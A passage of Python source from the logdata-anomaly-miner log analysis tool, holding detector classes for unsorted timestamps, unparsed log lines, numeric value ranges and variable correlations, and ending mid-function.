""" def __init__(self, subhandler_list, stop_when_handled_flag=False): # avoid "defined outside init" issue self.log_success, self.log_total = [None]*2 super().__init__( mutable_default_args=["subhandler_list"], subhandler_list=subhandler_list, stop_when_handled_flag=stop_when_handled_flag) self.latest_timestamp_seen = 0 def receive_atom(self, log_atom): """ Pass the atom to the subhandlers. @return false when no subhandler was able to handle the atom. """ self.log_total += 1 if log_atom.get_timestamp() is not None: if log_atom.get_timestamp() < self.latest_timestamp_seen: log_atom.set_timestamp(self.latest_timestamp_seen) else: self.latest_timestamp_seen = log_atom.get_timestamp() result = False for handler, _ in self.subhandler_list: handler_result = handler.receive_atom(log_atom) if handler_result is True: result = True if self.stop_when_handled_flag: break if result: self.log_success += 1 return result TimestampsUnsortedDetector.py000066400000000000000000000075251437606560100367020ustar00rootroot00000000000000logdata-anomaly-miner-2.6.1/source/root/usr/lib/logdata-anomaly-miner/aminer/analysis""" This module defines a detector for unsorted timestamps. This program is free software: you can redistribute it and/or modify it under the terms of the GNU General Public License as published by the Free Software Foundation, either version 3 of the License, or (at your option) any later version. This program is distributed in the hope that it will be useful, but WITHOUT ANY WARRANTY; without even the implied warranty of MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the GNU General Public License for more details. You should have received a copy of the GNU General Public License along with this program. If not, see . """ import os from aminer.input.InputInterfaces import AtomHandlerInterface from datetime import datetime from aminer.AminerConfig import CONFIG_KEY_LOG_LINE_PREFIX, DEFAULT_LOG_LINE_PREFIX from aminer import AminerConfig class TimestampsUnsortedDetector(AtomHandlerInterface): """ This class creates events when unsorted timestamps are detected. This is useful mostly to detect algorithm malfunction or configuration errors, e.g. invalid timezone configuration. """ def __init__(self, aminer_config, anomaly_event_handlers, exit_on_error_flag=False, output_logline=True): """ Initialize the detector. @param aminer_config configuration from analysis_context. @param anomaly_event_handlers for handling events, e.g., print events to stdout. @param exit_on_error_flag exit the aminer forcefully if a log atom with a wrong timestamp is found. @param output_logline specifies whether the full parsed log atom should be provided in the output. """ # avoid "defined outside init" issue self.log_success, self.log_total = [None]*2 super().__init__( aminer_config=aminer_config, anomaly_event_handlers=anomaly_event_handlers, exit_on_error_flag=exit_on_error_flag, output_logline=output_logline ) self.last_timestamp = 0 def receive_atom(self, log_atom): """ Receive on parsed atom and the information about the parser match. @param log_atom the parsed log atom @return True if this handler was really able to handle and process the match. Depending on this information, the caller may decide if it makes sense passing the parsed atom also to other handlers. """ self.log_total += 1 if log_atom.get_timestamp() is None: return False if log_atom.get_timestamp() < self.last_timestamp: try: data = log_atom.raw_data.decode(AminerConfig.ENCODING) except UnicodeError: data = repr(log_atom.raw_data) original_log_line_prefix = self.aminer_config.config_properties.get(CONFIG_KEY_LOG_LINE_PREFIX, DEFAULT_LOG_LINE_PREFIX) if self.output_logline: sorted_log_lines = [log_atom.parser_match.match_element.annotate_match('') + os.linesep + original_log_line_prefix + data] else: sorted_log_lines = [original_log_line_prefix + data] analysis_component = {'LastTimestamp': self.last_timestamp} event_data = {'AnalysisComponent': analysis_component} for listener in self.anomaly_event_handlers: listener.receive_event( f'Analysis.{self.__class__.__name__}', f"Timestamp {datetime.fromtimestamp(log_atom.get_timestamp()).strftime('%Y-%m-%d %H:%M:%S')} below " f"{datetime.fromtimestamp(self.last_timestamp).strftime('%Y-%m-%d %H:%M:%S')}", sorted_log_lines, event_data, log_atom, self) if self.exit_on_error_flag: import sys sys.exit(1) self.last_timestamp = log_atom.get_timestamp() self.log_success += 1 return True UnparsedAtomHandlers.py000066400000000000000000000061431437606560100354140ustar00rootroot00000000000000logdata-anomaly-miner-2.6.1/source/root/usr/lib/logdata-anomaly-miner/aminer/analysis""" This module defines a handler that forwards unparsed atoms to the event handlers. This program is free software: you can redistribute it and/or modify it under the terms of the GNU General Public License as published by the Free Software Foundation, either version 3 of the License, or (at your option) any later version. This program is distributed in the hope that it will be useful, but WITHOUT ANY WARRANTY; without even the implied warranty of MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the GNU General Public License for more details. You should have received a copy of the GNU General Public License along with this program. If not, see . """ from aminer.input.InputInterfaces import AtomHandlerInterface from aminer import AminerConfig from aminer.parsing.MatchContext import DebugMatchContext class SimpleUnparsedAtomHandler(AtomHandlerInterface): """Handlers of this class will just forward the received unparsed atoms to the registered event handlers.""" def __init__(self, anomaly_event_handlers): """ Initialise the Unparsed atom handler. @param anomaly_event_handlers for handling events, e.g., print events to stdout. """ super().__init__(anomaly_event_handlers=anomaly_event_handlers) def receive_atom(self, log_atom): """Receive an unparsed atom to create events for each.""" if log_atom.is_parsed(): return False try: data = log_atom.raw_data.decode(AminerConfig.ENCODING) except UnicodeError: data = repr(log_atom.raw_data) self.send_event_to_handlers(data, log_atom) return True def send_event_to_handlers(self, data, log_atom): """Send the data to the event handlers.""" event_data = {} for listener in self.anomaly_event_handlers: listener.receive_event('Input.UnparsedAtomHandler', 'Unparsed atom received', [data], event_data, log_atom, self) class VerboseUnparsedAtomHandler(SimpleUnparsedAtomHandler): """Handlers of this class will forward received unparsed atoms to the registered event handlers applying the DebugMatchContext.""" def __init__(self, anomaly_event_handlers, parsing_model): """ Initialise the Unparsed atom handler. @param anomaly_event_handlers for handling events, e.g., print events to stdout. """ super().__init__(anomaly_event_handlers) self.parsing_model = parsing_model def send_event_to_handlers(self, data, log_atom): """Send the data to the event handlers.""" match_context = DebugMatchContext(log_atom.raw_data) self.parsing_model.get_match_element('', match_context) debug_info = match_context.get_debug_info() debug_lines = [] for line in debug_info.split('\n'): debug_lines.append(line.strip()) event_data = {'DebugLog': debug_lines} for listener in self.anomaly_event_handlers: listener.receive_event( 'Input.VerboseUnparsedAtomHandler', 'Unparsed atom received', [debug_info + data], event_data, log_atom, self) ValueRangeDetector.py000066400000000000000000000301041437606560100350460ustar00rootroot00000000000000logdata-anomaly-miner-2.6.1/source/root/usr/lib/logdata-anomaly-miner/aminer/analysis""" This module defines an detector for numeric value ranges. This program is free software: you can redistribute it and/or modify it under the terms of the GNU General Public License as published by the Free Software Foundation, either version 3 of the License, or (at your option) any later version. This program is distributed in the hope that it will be useful, but WITHOUT ANY WARRANTY; without even the implied warranty of MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the GNU General Public License for more details. You should have received a copy of the GNU General Public License along with this program. If not, see . """ import time import os import logging from aminer.AminerConfig import DEBUG_LOG_NAME, KEY_PERSISTENCE_PERIOD, DEFAULT_PERSISTENCE_PERIOD, STAT_LOG_NAME,\ CONFIG_KEY_LOG_LINE_PREFIX, DEFAULT_LOG_LINE_PREFIX from aminer import AminerConfig from aminer.AnalysisChild import AnalysisContext from aminer.events.EventInterfaces import EventSourceInterface from aminer.input.InputInterfaces import AtomHandlerInterface from aminer.util import PersistenceUtil from aminer.util.TimeTriggeredComponentInterface import TimeTriggeredComponentInterface class ValueRangeDetector(AtomHandlerInterface, TimeTriggeredComponentInterface, EventSourceInterface): """This class creates events when numeric values are outside learned intervals.""" time_trigger_class = AnalysisContext.TIME_TRIGGER_CLASS_REALTIME def __init__(self, aminer_config, anomaly_event_handlers, id_path_list, target_path_list=None, persistence_id='Default', learn_mode=False, output_logline=True, ignore_list=None, constraint_list=None, stop_learning_time=None, stop_learning_no_anomaly_time=None): """ Initialize the detector. This will also trigger reading or creation of persistence storage location. @param aminer_config configuration from analysis_context. @param anomaly_event_handlers for handling events, e.g., print events to stdout. @param id_path_list to specify group identifiers for which numeric ranges should be learned. @param target_path_list parser paths of values to be analyzed. Multiple paths mean that all values occurring in these paths are considered for value range generation. @param persistence_id name of persistence document. @param learn_mode specifies whether value ranges should be extended when values outside of ranges are observed. @param output_logline specifies whether the full parsed log atom should be provided in the output. @param ignore_list list of paths that are not considered for analysis, i.e., events that contain one of these paths are omitted. @param constraint_list list of paths that have to be present in the log atom to be analyzed. @param stop_learning_time switch the learn_mode to False after the time. @param stop_learning_no_anomaly_time switch the learn_mode to False after no anomaly was detected for that time. """ # avoid "defined outside init" issue self.learn_mode, self.stop_learning_timestamp, self.next_persist_time, self.log_success, self.log_total = [None]*5 super().__init__( mutable_default_args=["target_path_list", "ignore_list", "constraint_list"], aminer_config=aminer_config, anomaly_event_handlers=anomaly_event_handlers, id_path_list=id_path_list, target_path_list=target_path_list, learn_mode=learn_mode, output_logline=output_logline, ignore_list=ignore_list, constraint_list=constraint_list, stop_learning_time=stop_learning_time, stop_learning_no_anomaly_time=stop_learning_no_anomaly_time ) self.ranges_min = {} self.ranges_max = {} # Persisted data consists of min and max values for each identifier, i.e., # [["min", [], ], ["max", [], ]] self.persistence_file_name = AminerConfig.build_persistence_file_name(aminer_config, self.__class__.__name__, persistence_id) PersistenceUtil.add_persistable_component(self) persistence_data = PersistenceUtil.load_json(self.persistence_file_name) if persistence_data is not None: self.ranges_min = persistence_data[0] self.ranges_max = persistence_data[1] def receive_atom(self, log_atom): """Receive a log atom from a source.""" self.log_total += 1 parser_match = log_atom.parser_match if self.learn_mode is True and self.stop_learning_timestamp is not None and \ self.stop_learning_timestamp < log_atom.atom_time: logging.getLogger(DEBUG_LOG_NAME).info("Stopping learning in the %s.", self.__class__.__name__) self.learn_mode = False # Skip atom when ignore paths in atom or constraint paths not in atom. all_paths_set = set(parser_match.get_match_dictionary().keys()) if len(all_paths_set.intersection(self.ignore_list)) > 0 or \ len(all_paths_set.intersection(self.constraint_list)) != len(self.constraint_list): return # Store all values from target target_path_list in a list. values = [] all_values_none = True for path in self.target_path_list: match = parser_match.get_match_dictionary().get(path) if match is None: continue matches = [] if isinstance(match, list): matches = match else: matches.append(match) for match in matches: value = match.match_object if value is not None: all_values_none = False values.append(value) if all_values_none is True: return # Store all values from id paths in a list. Use empty list as default path if not applicable. id_vals = [] for path in self.id_path_list: match = parser_match.get_match_dictionary().get(path) if match is None: continue matches = [] if isinstance(match, list): matches = match else: matches.append(match) for match in matches: if isinstance(match.match_object, bytes): value = match.match_object.decode(AminerConfig.ENCODING) else: value = str(match.match_object) id_vals.append(value) id_event = tuple(id_vals) # Check if one of the values is outside of expected value ranges for a specific id path. if id_event in self.ranges_min and (min(values) < self.ranges_min[id_event] or max(values) > self.ranges_max[id_event]): try: data = log_atom.raw_data.decode(AminerConfig.ENCODING) except UnicodeError: data = repr(log_atom.raw_data) if self.output_logline: original_log_line_prefix = self.aminer_config.config_properties.get( CONFIG_KEY_LOG_LINE_PREFIX, DEFAULT_LOG_LINE_PREFIX) sorted_log_lines = [log_atom.parser_match.match_element.annotate_match('') + os.linesep + original_log_line_prefix + data] else: sorted_log_lines = [data] analysis_component = {'AffectedLogAtomPaths': self.target_path_list, 'AffectedLogAtomValues': values, 'Range': [self.ranges_min[id_event], self.ranges_max[id_event]], 'IDpaths': self.id_path_list, 'IDvalues': list(id_event)} event_data = {'AnalysisComponent': analysis_component} for listener in self.anomaly_event_handlers: listener.receive_event(f'Analysis.{self.__class__.__name__}', 'Value range anomaly detected', sorted_log_lines, event_data, log_atom, self) # Extend ranges if learn mode is active. if self.learn_mode is True: if id_event in self.ranges_min: self.ranges_min[id_event] = min(self.ranges_min[id_event], min(values)) else: self.ranges_min[id_event] = min(values) if id_event in self.ranges_max: self.ranges_max[id_event] = max(self.ranges_max[id_event], max(values)) else: self.ranges_max[id_event] = max(values) if self.stop_learning_timestamp is not None and self.stop_learning_no_anomaly_time is not None: self.stop_learning_timestamp = time.time() + self.stop_learning_no_anomaly_time self.log_success += 1 def do_timer(self, trigger_time): """Check if current ruleset should be persisted.""" if self.next_persist_time is None: return self.aminer_config.config_properties.get(KEY_PERSISTENCE_PERIOD, DEFAULT_PERSISTENCE_PERIOD) delta = self.next_persist_time - trigger_time if delta <= 0: self.do_persist() delta = self.aminer_config.config_properties.get(KEY_PERSISTENCE_PERIOD, DEFAULT_PERSISTENCE_PERIOD) self.next_persist_time = time.time() + delta return delta def do_persist(self): """Immediately write persistence data to storage.""" PersistenceUtil.store_json(self.persistence_file_name, [self.ranges_min, self.ranges_max]) logging.getLogger(AminerConfig.DEBUG_LOG_NAME).debug("%s persisted data.", self.__class__.__name__) def allowlist_event(self, event_type, event_data, allowlisting_data): """ Allowlist an event generated by this source using the information emitted when generating the event. @return a message with information about allowlisting @throws Exception when allowlisting of this special event using given allowlisting_data was not possible. """ if event_type != f'Analysis.{self.__class__.__name__}': msg = 'Event not from this source' logging.getLogger(DEBUG_LOG_NAME).error(msg) raise Exception(msg) if allowlisting_data is not None: msg = 'Allowlisting data not understood by this detector' logging.getLogger(DEBUG_LOG_NAME).error(msg) raise Exception(msg) if event_data not in self.constraint_list: self.constraint_list.append(event_data) return f'Allowlisted path {event_data}.' def blocklist_event(self, event_type, event_data, blocklisting_data): """ Blocklist an event generated by this source using the information emitted when generating the event. @return a message with information about blocklisting @throws Exception when blocklisting of this special event using given blocklisting_data was not possible. """ if event_type != f'Analysis.{self.__class__.__name__}': msg = 'Event not from this source' logging.getLogger(DEBUG_LOG_NAME).error(msg) raise Exception(msg) if blocklisting_data is not None: msg = 'Blocklisting data not understood by this detector' logging.getLogger(DEBUG_LOG_NAME).error(msg) raise Exception(msg) if event_data not in self.ignore_list: self.ignore_list.append(event_data) return f'Blocklisted path {event_data}.' def log_statistics(self, component_name): """ Log statistics of an AtomHandler. Override this method for more sophisticated statistics output of the AtomHandler. @param component_name the name of the component which is printed in the log line. """ if AminerConfig.STAT_LEVEL == 1: logging.getLogger(STAT_LOG_NAME).info( "'%s' processed %d out of %d log atoms successfully in the last 60 minutes.", component_name, self.log_success, self.log_total) elif AminerConfig.STAT_LEVEL == 2: logging.getLogger(STAT_LOG_NAME).info( "'%s' processed %d out of %d log atoms successfully in the last 60 minutes.", component_name, self.log_success, self.log_total) self.log_success = 0 self.log_total = 0 VariableCorrelationDetector.py000066400000000000000000003537111437606560100367600ustar00rootroot00000000000000logdata-anomaly-miner-2.6.1/source/root/usr/lib/logdata-anomaly-miner/aminer/analysis"""This module defines a detector for correlations between discrete variables.""" import numpy as np import logging import sys from scipy.stats import chi2 import time from aminer.AminerConfig import DEBUG_LOG_NAME, build_persistence_file_name, KEY_PERSISTENCE_PERIOD, DEFAULT_PERSISTENCE_PERIOD from aminer.AnalysisChild import AnalysisContext from aminer.events.EventInterfaces import EventSourceInterface from aminer.input.InputInterfaces import AtomHandlerInterface from aminer.util.TimeTriggeredComponentInterface import TimeTriggeredComponentInterface from aminer.util import PersistenceUtil class VariableCorrelationDetector(AtomHandlerInterface, TimeTriggeredComponentInterface, EventSourceInterface): """ This class first finds for each eventType a list of pairs of variables, which are afterwards tested if they are correlated. For this a couple of preselection methods can be used. (See self.used_presel_meth) Thereafter the correlations are checked, with the selected methods. (See self.used_cor_meth) This module builds upon the event_type_detector. """ time_trigger_class = AnalysisContext.TIME_TRIGGER_CLASS_REALTIME def __init__(self, aminer_config, anomaly_event_handlers, event_type_detector, persistence_id='Default', target_path_list=None, num_init=100, num_update=100, disc_div_thres=0.3, num_steps_create_new_rules=-1, num_upd_until_validation=20, num_end_learning_phase=-1, check_cor_thres=0.5, check_cor_prob_thres=1, check_cor_num_thres=10, min_values_cors_thres=5, new_vals_alarm_thres=3.5, num_bt=30, alpha_bt=0.1, used_homogeneity_test='Chi', alpha_chisquare_test=0.05, max_dist_rule_distr=0.1, used_presel_meth=None, intersect_presel_meth=False, percentage_random_cors=0.20, match_disc_vals_sim_tresh=0.7, exclude_due_distr_lower_limit=0.4, match_disc_distr_threshold=0.5, used_cor_meth=None, used_validate_cor_meth=None, validate_cor_cover_vals_thres=0.7, validate_cor_distinct_thres=0.05, ignore_list=None, constraint_list=None, learn_mode=True, stop_learning_time=None, stop_learning_no_anomaly_time=None): """ Initialize the detector. This will also trigger reading or creation of persistence storage location. @param aminer_config configuration from analysis_context. @param anomaly_event_handlers for handling events, e.g., print events to stdout. @param event_type_detector used to track the number of occurring events. @param persistence_id name of persistence file. @param target_path_list parser paths of values to be analyzed. Multiple paths mean that all values occurring in these paths are considered for value range generation. @param num_init minimal number of lines of one event type to initialize the correlation rules. @param num_update number of lines after the initialization after which the correlations are periodically tested and updated. @param disc_div_thres diversity threshold for variables to be considered discrete. @param num_steps_create_new_rules number of update steps, for which new rules are generated periodically. States False if rules should not be updated. @param num_upd_until_validation number of update steps, for which the rules are validated periodically. @param num_end_learning_phase number of update steps until the update phase ends and the test phase begins; False if no End should be defined. @param check_cor_thres threshold for the number of allowed different values of the distribution to be considered a correlation. @param check_cor_prob_thres threshold for the difference of the probability of the values to be considered a correlation. @param check_cor_num_thres number of allowed different values for the calculation if the distribution can be considered a correlation. @param min_values_cors_thres minimal number of appearances of values on the left side to consider the distribution as a possible correlation. @param new_vals_alarm_thres threshold which has to be exceeded by number of new values divided by number of old values to generate an alarm. @param num_bt number of considered test-samples for the binomial test. @param alpha_bt significance niveau for the binomial test for the test results. @param used_homogeneity_test states the used homogeneity test which is used for the updates and tests of the correlations. The implemented methods are ['Chi', 'MaxDist']. @param alpha_chisquare_test significance level alpha for the chi-square test. @param max_dist_rule_distr maximum distance between the distribution of the rule and the distribution of the read in values before the rule fails. @param used_presel_meth used preselection methods. The implemented methods are ['matchDiscDistr', 'excludeDueDistr', 'matchDiscVals', 'random'] @param intersect_presel_meth states if the intersection or the union of the possible correlations found by the used_presel_meth is used for the resulting correlations. @param percentage_random_cors percentage of the randomly picked correlations of all possible ones in the preselection method random. @param match_disc_vals_sim_tresh similarity threshold for the preselection method pick_cor_match_disc_vals. @param exclude_due_distr_lower_limit lower limit for the maximal appearance to one value of the distributions. If the maximal appearance is exceeded the variable is excluded. @param match_disc_distr_threshold threshold for the preselection method pick_cor_match_disc_distr. @param used_cor_meth used correlation detection methods. The implemented methods are ['Rel', 'WRel']. @param used_validate_cor_meth used validation methods. The implemented methods are ['coverVals', 'distinctDistr']. @param validate_cor_cover_vals_thres threshold for the validation method coverVals. The higher the threshold the more correlations must be detected to be validated a correlation. @param validate_cor_distinct_thres threshold for the validation method distinctDistr. The threshold states which value the variance of the distributions have to surpass to be considered real correlations. The lower the value the less likely that the correlations are being rejected. @param ignore_list list of paths that are not considered for analysis, i.e., events that contain one of these paths are omitted. @param constraint_list list of paths that have to be present in the log atom to be analyzed. @param learn_mode specifies whether new values should be learned. @param stop_learning_time switch the learn_mode to False after the time. @param stop_learning_no_anomaly_time switch the learn_mode to False after no anomaly was detected for that time. """ # avoid "defined outside init" issue self.learn_mode, self.stop_learning_timestamp, self.next_persist_time, self.log_success, self.log_total = [None]*5 super().__init__( mutable_default_args=["target_path_list", "ignore_list", "constraint_list"], aminer_config=aminer_config, anomaly_event_handlers=anomaly_event_handlers, event_type_detector=event_type_detector, persistence_id=persistence_id, target_path_list=target_path_list, num_init=num_init, num_update=num_update, disc_div_thres=disc_div_thres, num_steps_create_new_rules=num_steps_create_new_rules, num_upd_until_validation=num_upd_until_validation, num_end_learning_phase=num_end_learning_phase, check_cor_thres=check_cor_thres, check_cor_prob_thres=check_cor_prob_thres, check_cor_num_thres=check_cor_num_thres, min_values_cors_thres=min_values_cors_thres, new_vals_alarm_thres=new_vals_alarm_thres, num_bt=num_bt, alpha_bt=alpha_bt, used_homogeneity_test=used_homogeneity_test, alpha_chisquare_test=alpha_chisquare_test, max_dist_rule_distr=max_dist_rule_distr, used_presel_meth=used_presel_meth, intersect_presel_meth=intersect_presel_meth, percentage_random_cors=percentage_random_cors, match_disc_vals_sim_tresh=match_disc_vals_sim_tresh, exclude_due_distr_lower_limit=exclude_due_distr_lower_limit, match_disc_distr_threshold=match_disc_distr_threshold, used_cor_meth=used_cor_meth, used_validate_cor_meth=used_validate_cor_meth, validate_cor_cover_vals_thres=validate_cor_cover_vals_thres, validate_cor_distinct_thres=validate_cor_distinct_thres, ignore_list=ignore_list, constraint_list=constraint_list, learn_mode=learn_mode, stop_learning_time=stop_learning_time, stop_learning_no_anomaly_time=stop_learning_no_anomaly_time ) self.event_type_detector.add_following_modules(self) self.variable_type_detector = None if any(self.event_type_detector.following_modules[j].__class__.__name__ == 'VariableTypeDetector' for j in range( len(self.event_type_detector.following_modules))): try: self.variable_type_detector = self.event_type_detector.following_modules[next(j for j in range( len(self.event_type_detector.following_modules)) if self.event_type_detector.following_modules[j].__class__.__name__ == 'VariableTypeDetector')] except StopIteration: pass if self.event_type_detector.min_num_vals < max(num_init, num_update): msg = f'Changed the parameter min_num_vals of the ETD from {self.event_type_detector.min_num_vals} to ' \ f'{max(num_init, num_update)} to prevent errors in the execution of the VCD' logging.getLogger(DEBUG_LOG_NAME).warning(msg) print('WARNING: ' + msg, file=sys.stderr) self.event_type_detector.min_num_vals = max(num_init, num_update) if self.event_type_detector.max_num_vals < max(num_init, num_update) + 500: msg = f'Changed the parameter max_num_vals of the ETD from {self.event_type_detector.max_num_vals} to ' \ f'{max(num_init, num_update) + 500} to prevent errors in the execution of the VCD' logging.getLogger(DEBUG_LOG_NAME).warning(msg) print('WARNING: ' + msg, file=sys.stderr) self.event_type_detector.max_num_vals = max(num_init, num_update) + 500 if self.used_homogeneity_test not in ['Chi', 'MaxDist']: raise ValueError(f"The homogeneity test '{used_homogeneity_test}' does not exist!") if self.used_presel_meth is None: self.used_presel_meth = [] for presel_meth in self.used_presel_meth: if presel_meth not in ['matchDiscDistr', 'excludeDueDistr', 'matchDiscVals', 'random']: raise ValueError(f"The preselection method '{presel_meth}' does not exist!") if self.percentage_random_cors <= 0. or self.percentage_random_cors >= 1.: raise ValueError('The Random preselection method makes no sense if percentage_random_cors = %f. If the percentage_random_cors' ' is >= 1.0 better use no preselection method for that case.') if self.used_cor_meth is None or self.used_cor_meth == []: self.used_cor_meth = ['Rel', 'WRel'] for cor_meth in self.used_cor_meth: if cor_meth not in ['Rel', 'WRel']: raise ValueError(f"The correlation rule '{cor_meth}' does not exist!") if self.used_validate_cor_meth is None: self.used_validate_cor_meth = ['coverVals', 'distinctDistr'] # The distinctDistr validation requires the 'WRel' method. if 'WRel' not in self.used_cor_meth: self.used_validate_cor_meth = ['coverVals'] for validate_cor_meth in self.used_validate_cor_meth: if validate_cor_meth not in ['coverVals', 'distinctDistr']: raise ValueError(f"The validation correlation rule '{validate_cor_meth}' does not exist!") if 'WRel' not in self.used_cor_meth and 'distinctDistr' in self.used_validate_cor_meth: raise ValueError("The 'distinctDistr' validation correlation rule requires the 'WRel' correlation method!") # Calculate the minimal number of successes for the BT self.min_successes_bt = self.bt_min_successes(self.num_bt, 1 - self.alpha_bt, self.alpha_bt) self.update_rules = [] # List which states for what event types the rules are updated self.generate_rules = [] # List which states for what event types new rules are being generated self.min_successes_bt = 0 # Minimal number of successes for the binomialtest self.discrete_indices = [] # List of the indices to every event type which are assumed to be discrete self.pos_var_val = [] # List of the possible values to the single variables of the event types self.pos_var_cor = [] # List of all pairs of variables of the event types which are assumed to be correlated self.rel_list = [] # List of lists, that saves the data for the found correlations with the method Rel. # First index states the event_index, second index states which correlation is examined, third index states which direction of the # correlation is examined, fourth index states the value of the first variable and the fifth value states the value of the second # variable. The content is the number of appearance in the log lines. self.w_rel_list = [] # List of lists, that saves the data for the correlation finding with WRel. # First index states the event_index, second index states which correlation is examined, third index states which direction of the # correlation is examined, fourth index states the value of the first variable and the fifth value states the value of the second # variable. The content is the number of appearance in the log lines. self.w_rel_num_ll_to_vals = [] # List of the number of lines in which the values of the first variable have appeared self.w_rel_ht_results = [] # List of the results of the homogeneity tests for the binomial test self.w_rel_confidences = [] # List for the confidences of the homogeneity tests self.initialized = [] # List that states if the single event types have been initiailized at least once self.log_atom = None # Loads the persistence self.persistence_id = persistence_id self.persistence_file_name = build_persistence_file_name(aminer_config, self.__class__.__name__, persistence_id) PersistenceUtil.add_persistable_component(self) persistence_data = PersistenceUtil.load_json(self.persistence_file_name) # Imports the persistence if self.event_type_detector.load_persistence_data is True if persistence_data is not None: self.load_persistence_data(persistence_data) # skipcq: PYL-W0613 def receive_atom(self, log_atom): """ Receive an parsed atom and the information about the parser match. @param log_atom the parsed log atom @return True if this handler was really able to handle and process the match. """ event_index = self.event_type_detector.current_index if event_index == -1: return False if self.learn_mode is True and self.stop_learning_timestamp is not None and \ self.stop_learning_timestamp < log_atom.atom_time: logging.getLogger(DEBUG_LOG_NAME).info("Stopping learning in the %s.", self.__class__.__name__) self.learn_mode = False parser_match = log_atom.parser_match for ignore_path in self.ignore_list: if ignore_path in parser_match.get_match_dictionary().keys(): return False constraint_path_flag = False for constraint_path in self.constraint_list: if parser_match.get_match_dictionary().get(constraint_path) is not None: constraint_path_flag = True break if not constraint_path_flag and self.constraint_list != []: return False self.log_atom = log_atom if self.event_type_detector.num_event_lines[event_index] >= self.num_init and ( len(self.initialized) <= event_index or not self.initialized[event_index]): # Initialisation Phase self.init_cor(event_index) # Initialise the correlations if self.update_rules[event_index] and self.learn_mode: self.validate_cor() # Validate the correlations and removes the cors, which fail the requirements if self.stop_learning_timestamp is not None and self.stop_learning_no_anomaly_time is not None: self.stop_learning_timestamp = log_atom.atom_time + self.stop_learning_no_anomaly_time # Print the found correlations if 'Rel' in self.used_cor_meth: self.print_ini_rel(event_index) if 'WRel' in self.used_cor_meth: self.print_ini_w_rel(event_index) # Updates or tests the correlations elif self.event_type_detector.num_event_lines[event_index] > self.num_init and \ (self.event_type_detector.num_event_lines[event_index] - self.num_init) % self.num_update == 0: # Checks if the correlations should be updated or tested if self.num_end_learning_phase < 0 or self.event_type_detector.num_event_lines[event_index]-self.num_init <= \ (self.num_update*self.num_end_learning_phase): # Update Phase self.update_rules[event_index] = True if self.num_steps_create_new_rules > 0 and ((self.event_type_detector.num_event_lines[ event_index]-self.num_init) / self.num_update) % self.num_steps_create_new_rules == 0: # generate new rules self.generate_rules[event_index] = True else: self.generate_rules[event_index] = False else: # Test Phase self.update_rules[event_index] = False self.generate_rules[event_index] = False # Updates or tests the correlations self.update_or_test_cor(event_index) if self.generate_rules[event_index] and ((self.event_type_detector.num_event_lines[ event_index] - self.num_init) / self.num_update / self.num_steps_create_new_rules) % self.num_upd_until_validation == 0: self.validate_cor() # Validate the correlations and removes the cors, which fail the requirements return True def do_timer(self, trigger_time): """Check if current ruleset should be persisted.""" if self.next_persist_time is None: return self.aminer_config.config_properties.get(KEY_PERSISTENCE_PERIOD, DEFAULT_PERSISTENCE_PERIOD) delta = self.next_persist_time - trigger_time if delta <= 0: self.do_persist() delta = self.aminer_config.config_properties.get(KEY_PERSISTENCE_PERIOD, DEFAULT_PERSISTENCE_PERIOD) self.next_persist_time = time.time() + delta return delta def do_persist(self): """Immediately write persistence data to storage.""" persistence_data = [self.pos_var_cor, self.pos_var_val, self.discrete_indices, self.update_rules, self.generate_rules, self.rel_list, self.w_rel_list, self.w_rel_num_ll_to_vals, self.w_rel_ht_results, self.w_rel_confidences] PersistenceUtil.store_json(self.persistence_file_name, persistence_data) def load_persistence_data(self, persistence_data): """Extract the persistence data and appends various lists to create a consistent state.""" self.pos_var_cor = persistence_data[0] self.pos_var_val = persistence_data[1] self.discrete_indices = persistence_data[2] self.update_rules = persistence_data[3] self.generate_rules = persistence_data[4] self.rel_list = persistence_data[5] self.w_rel_list = persistence_data[6] self.w_rel_num_ll_to_vals = persistence_data[7] self.w_rel_ht_results = persistence_data[8] self.w_rel_confidences = persistence_data[9] self.initialized = [False for _ in self.pos_var_cor] for event_index, indices in enumerate(self.discrete_indices): if len(indices) > 0: self.initialized[event_index] = True def allowlist_event(self, event_type, event_data, allowlisting_data): # skipcq: PYL-W0613 """ Allowlist an event generated by this source using the information emitted when generating the event. @return a message with information about allowlisting @throws Exception when allowlisting of this special event using given allowlisting_data was not possible. """ if event_type != f'Analysis.{self.__class__.__name__}': raise Exception('Event not from this source') raise Exception('No allowlisting for algorithm malfunction or configuration errors') def init_cor(self, event_index): """Initialise the possible correlations and runs the init-functions for the methods in self.used_cor_meth.""" # Append the supporting lists if necessary if len(self.pos_var_cor) < event_index+1: for i in range(event_index + 1 - len(self.pos_var_cor)): self.pos_var_cor.append([]) self.pos_var_val.append([]) self.discrete_indices.append([]) self.update_rules.append(True) self.generate_rules.append(True) self.initialized.append(False) self.initialized[event_index] = True # Initialise the indices to the assumed discrete variables if len(self.discrete_indices[event_index]) == 0: # If the var_typeD is linked, append the discrete fields if self.variable_type_detector is not None: for i in range(len(self.event_type_detector.variable_key_list[event_index])): # skipcq: PTC-W0060 if len(self.variable_type_detector.var_type[event_index][i]) > 0 and \ self.variable_type_detector.var_type[event_index][i][0] == 'd' and ( self.target_path_list == [] or self.event_type_detector.variable_key_list[event_index][i] in self.target_path_list): self.discrete_indices[event_index].append(i) self.pos_var_val[event_index].append(self.variable_type_detector.var_type[event_index][i][1]) # Else use the variables which are neither unique nor static # !!! else: self.discrete_indices[event_index] = [ var_index for var_index in range(len(self.event_type_detector.variable_key_list[event_index])) if self.target_path_list == [] or self.event_type_detector.variable_key_list[event_index][var_index] in self.target_path_list] for i in range(len(self.event_type_detector.values[event_index]) - 1, -1, -1): # skipcq: PTC-W0060 tmp_list = list(set(self.event_type_detector.values[event_index][i][-self.num_init:])) if len(tmp_list) == 1 or (len(tmp_list) > self.disc_div_thres * self.num_init): del self.discrete_indices[event_index][i] else: self.pos_var_val[event_index].append(tmp_list) self.pos_var_val[event_index].reverse() # Initialise the list of the possible correlations # If no preselection method is used all discrete variables are matched with each other if not self.used_presel_meth: self.pos_var_cor[event_index] = [[i, j] for i in range(len(self.discrete_indices[event_index])) for j in range( i+1, len(self.discrete_indices[event_index]))] # Else the preselection methods are used to generate the list of possible correlations else: first_run = True # Only used if the interception of the preselected possible correlations are further analysed # Generate the possible correlations for the preselection methods for meth in self.used_presel_meth: tmp_pos_var_cor = [] # List of the possible correlations for one preselection method if self.variable_type_detector is None: variable_values = [[] for _ in range(len(self.discrete_indices[event_index]))] # skipcq: PTC-W0060 variable_distributions = [[] 